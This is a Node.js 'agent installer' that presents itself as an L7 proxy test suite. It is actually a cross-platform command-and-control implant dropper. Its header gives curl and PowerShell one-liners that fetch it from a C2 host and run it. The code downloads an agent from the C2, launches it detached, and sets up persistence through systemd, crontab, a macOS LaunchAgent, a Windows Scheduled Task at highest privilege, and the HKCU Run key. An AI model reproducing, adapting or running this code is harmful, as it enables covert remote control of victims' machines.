#!/usr/bin/env node
/**
 * L7 Proxy Test Suite — Universal Agent Installer
 * Runs on Windows, macOS, Linux — requires only Node.js
 * Generated by C2: __C2_HOST__:__C2_PORT__
 *
 * Usage (any platform with Node.js):
 *   node install.js
 *
 * Or inline (Linux/macOS):
 *   node -e "$(curl -s 'http://__C2_HOST__:__C2_PORT__/install.js?host=__C2_HOST__&port=__C2_PORT__')"
 *
 * Or inline (Windows PowerShell):
 *   node -e (iwr 'http://__C2_HOST__:__C2_PORT__/install.js?host=__C2_HOST__&port=__C2_PORT__').Content
 */

const os      = require('os');
const fs      = require('fs');
const path    = require('path');
const https   = require('https');
const http    = require('http');
const { execSync, spawn } = require('child_process');

const C2_HOST  = '__C2_HOST__';
const C2_PORT  = '__C2_PORT__';
const C2_BASE  = `http://${C2_HOST}:${C2_PORT}`;
const PLATFORM = process.platform; // 'win32' | 'darwin' | 'linux'
const AGENT_DIR  = path.join(os.homedir(), '.l7agent');
const AGENT_FILE = path.join(AGENT_DIR, 'agent.py');
const LOG_FILE   = path.join(AGENT_DIR, 'agent.log');

const log  = (msg) => console.log(`[+] ${msg}`);
const warn = (msg) => console.log(`[!] ${msg}`);
const info = (msg) => console.log(`[*] ${msg}`);

// ── Helpers ────────────────────────────────────────────────────────────────
function run(cmd, opts = {}) {
    try {
        return execSync(cmd, { stdio: opts.silent ? 'pipe' : 'inherit', shell: true });
    } catch (e) {
        if (opts.throw) throw e;
        return null;
    }
}

function hasCmd(cmd) {
    try { execSync(`${PLATFORM === 'win32' ? 'where' : 'which'} ${cmd}`, { stdio: 'pipe' }); return true; }
    catch { return false; }
}

function download(url, dest) {
    return new Promise((resolve, reject) => {
        info(`Downloading ${url}`);
        const proto = url.startsWith('https') ? https : http;
        const file  = fs.createWriteStream(dest);
        proto.get(url, res => {
            if (res.statusCode === 301 || res.statusCode === 302) {
                file.close();
                return download(res.headers.location, dest).then(resolve).catch(reject);
            }
            res.pipe(file);
            file.on('finish', () => { file.close(); resolve(); });
        }).on('error', reject);
    });
}

// ── Create agent dir ───────────────────────────────────────────────────────
if (!fs.existsSync(AGENT_DIR)) fs.mkdirSync(AGENT_DIR, { recursive: true });
info(`Agent dir: ${AGENT_DIR}`);

// ── Detect Python ──────────────────────────────────────────────────────────
function findPython() {
    const candidates = PLATFORM === 'win32'
        ? ['python', 'python3', 'py']
        : ['python3', 'python', 'python3.12', 'python3.11', 'python3.10', 'python3.9'];
    for (const c of candidates) {
        if (!hasCmd(c)) continue;
        try {
            const ver = execSync(`${c} -c "import sys; print(sys.version_info[0])"`, { stdio: 'pipe' }).toString().trim();
            if (parseInt(ver) >= 3) return c;
        } catch {}
    }
    return null;
}

async function installPython() {
    warn('Python 3 not found — attempting install...');
    if (PLATFORM === 'linux') {
        if (hasCmd('apt-get'))  { run('apt-get update -qq && apt-get install -y python3'); return 'python3'; }
        if (hasCmd('dnf'))      { run('dnf install -y python3'); return 'python3'; }
        if (hasCmd('yum'))      { run('yum install -y python3'); return 'python3'; }
        if (hasCmd('pacman'))   { run('pacman -Sy --noconfirm python'); return 'python3'; }
        if (hasCmd('apk'))      { run('apk add --no-cache python3'); return 'python3'; }
    } else if (PLATFORM === 'darwin') {
        if (hasCmd('brew'))     { run('brew install python3'); return 'python3'; }
        warn('Install Homebrew first: https://brew.sh — then re-run');
        process.exit(1);
    } else if (PLATFORM === 'win32') {
        if (hasCmd('winget')) {
            run('winget install --id Python.Python.3.11 --silent --accept-source-agreements --accept-package-agreements');
        } else {
            // Download Python installer
            const installer = path.join(os.tmpdir(), 'python_installer.exe');
            await download('https://www.python.org/ftp/python/3.11.9/python-3.11.9-amd64.exe', installer);
            run(`"${installer}" /quiet InstallAllUsers=0 PrependPath=1`);
        }
        return 'python';
    }
    warn('Cannot auto-install Python. Please install manually: https://python.org');
    process.exit(1);
}

// ── Persist ────────────────────────────────────────────────────────────────
function persistLinux(py) {
    // Try systemd first
    if (hasCmd('systemctl')) {
        const svc = `[Unit]\nDescription=L7 Agent\nAfter=network.target\n\n[Service]\nExecStart=${py} ${AGENT_FILE}\nRestart=always\nRestartSec=10\nStandardOutput=append:${LOG_FILE}\nStandardError=append:${LOG_FILE}\n\n[Install]\nWantedBy=multi-user.target\n`;
        const svcPath = '/etc/systemd/system/l7agent.service';
        try {
            fs.writeFileSync('/tmp/l7agent.service', svc);
            run(`mv /tmp/l7agent.service ${svcPath} && systemctl daemon-reload && systemctl enable l7agent && systemctl start l7agent`);
            log('Installed as systemd service (l7agent)');
            return;
        } catch {}
    }
    // Cron fallback
    try {
        const existing = execSync('crontab -l 2>/dev/null', { stdio: 'pipe' }).toString();
        const cleaned  = existing.split('\n').filter(l => !l.includes('l7agent')).join('\n');
        const entry    = `${cleaned}\n@reboot ${py} ${AGENT_FILE} >> ${LOG_FILE} 2>&1\n`;
        const tmp      = path.join(os.tmpdir(), 'l7cron');
        fs.writeFileSync(tmp, entry);
        run(`crontab ${tmp}`);
        log('Added to crontab (@reboot)');
    } catch { warn('Could not set persistence — run manually on reboot'); }
}

function persistMac(py) {
    // LaunchAgent plist
    const plistDir  = path.join(os.homedir(), 'Library', 'LaunchAgents');
    const plistPath = path.join(plistDir, 'com.l7agent.plist');
    try {
        if (!fs.existsSync(plistDir)) fs.mkdirSync(plistDir, { recursive: true });
        const plist = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.l7agent</string>
  <key>ProgramArguments</key><array><string>${py}</string><string>${AGENT_FILE}</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
  <key>StandardOutPath</key><string>${LOG_FILE}</string>
  <key>StandardErrorPath</key><string>${LOG_FILE}</string>
</dict></plist>`;
        fs.writeFileSync(plistPath, plist);
        run(`launchctl load ${plistPath}`);
        log('Installed as LaunchAgent (com.l7agent)');
    } catch {
        // Cron fallback
        try {
            const existing = execSync('crontab -l 2>/dev/null', { stdio: 'pipe' }).toString();
            const cleaned  = existing.split('\n').filter(l => !l.includes('l7agent')).join('\n');
            fs.writeFileSync(path.join(os.tmpdir(), 'l7cron'), `${cleaned}\n@reboot ${py} ${AGENT_FILE} >> ${LOG_FILE} 2>&1\n`);
            run(`crontab ${path.join(os.tmpdir(), 'l7cron')}`);
            log('Added to crontab (@reboot)');
        } catch {}
    }
}

function persistWindows(py) {
    // Task Scheduler
    const action = `"${py}" "${AGENT_FILE}"`;
    const result = run(
        `schtasks /create /tn "L7Agent" /tr ${action} /sc onlogon /rl highest /f`,
        { silent: true }
    );
    if (result !== null) {
        log('Scheduled Task "L7Agent" registered (runs at logon)');
        return;
    }
    // Registry fallback
    try {
        run(`reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v L7Agent /t REG_SZ /d "${action}" /f`);
        log('Added to HKCU Run registry key');
    } catch { warn('Could not set persistence'); }
}

// ── Main ───────────────────────────────────────────────────────────────────
(async () => {
    info(`L7 Agent Installer  |  C2: ${C2_BASE}  |  Platform: ${PLATFORM}`);

    // Find/install Python
    let py = findPython();
    if (!py) py = await installPython();
    log(`Using Python: ${py}`);

    // Download agent
    await download(`${C2_BASE}/api/agent/generate?host=${C2_HOST}&port=${C2_PORT}`, AGENT_FILE);
    log(`Agent saved to ${AGENT_FILE}`);

    // Start immediately
    info('Starting agent...');
    const logStream = fs.openSync(LOG_FILE, 'a');
    const child = spawn(py, [AGENT_FILE], {
        detached: true, stdio: ['ignore', logStream, logStream]
    });
    child.unref();
    log(`Agent started (PID ${child.pid})`);

    // Persist
    info('Setting up persistence...');
    if (PLATFORM === 'linux')  persistLinux(py);
    if (PLATFORM === 'darwin') persistMac(py);
    if (PLATFORM === 'win32')  persistWindows(py);

    // ── Optional: configure Prometheus scrape ─────────────────────────────
    info('Checking for Prometheus...');
    const promCfgPaths = [
        '/etc/prometheus/prometheus.yml',
        '/usr/local/etc/prometheus/prometheus.yml',
        path.join(os.homedir(), 'prometheus.yml'),
    ];
    let promCfg = null;
    for (const p of promCfgPaths) {
        if (fs.existsSync(p)) { promCfg = p; break; }
    }
    if (promCfg) {
        try {
            let cfg = fs.readFileSync(promCfg, 'utf8');
            if (!cfg.includes('l7_agent')) {
                const scrapeJob = `\n  - job_name: 'l7_agent'\n    static_configs:\n      - targets: ['localhost:9100']\n`;
                cfg = cfg.replace(/\nscrape_configs:/, `\nscrape_configs:${scrapeJob}`);
                fs.writeFileSync(promCfg, cfg);
                log(`Added l7_agent scrape job to ${promCfg}`);
                // Reload Prometheus if systemctl is available
                run('systemctl reload prometheus 2>/dev/null || true', { silent: true });
                log('Prometheus reloaded — metrics at http://localhost:9100/metrics');
            } else {
                log('Prometheus scrape job already present');
            }
        } catch (e) {
            warn('Could not update Prometheus config: ' + e.message);
        }
    } else {
        info('Prometheus not found — agent exposes metrics at http://0.0.0.0:9100/metrics');
        info('If you install Prometheus later, add this scrape job to prometheus.yml:');
        console.log(`  - job_name: 'l7_agent'`);
        console.log(`    static_configs:`);
        console.log(`      - targets: ['<THIS_HOST>:9100']`);
    }

    console.log(`\n[+] Installation complete.`);
    console.log(`    Agent dir:   ${AGENT_DIR}`);
    console.log(`    Logs:        ${LOG_FILE}`);
    console.log(`    C2:          ${C2_BASE}`);
    console.log(`    Metrics:     http://0.0.0.0:9100/metrics`);
})();
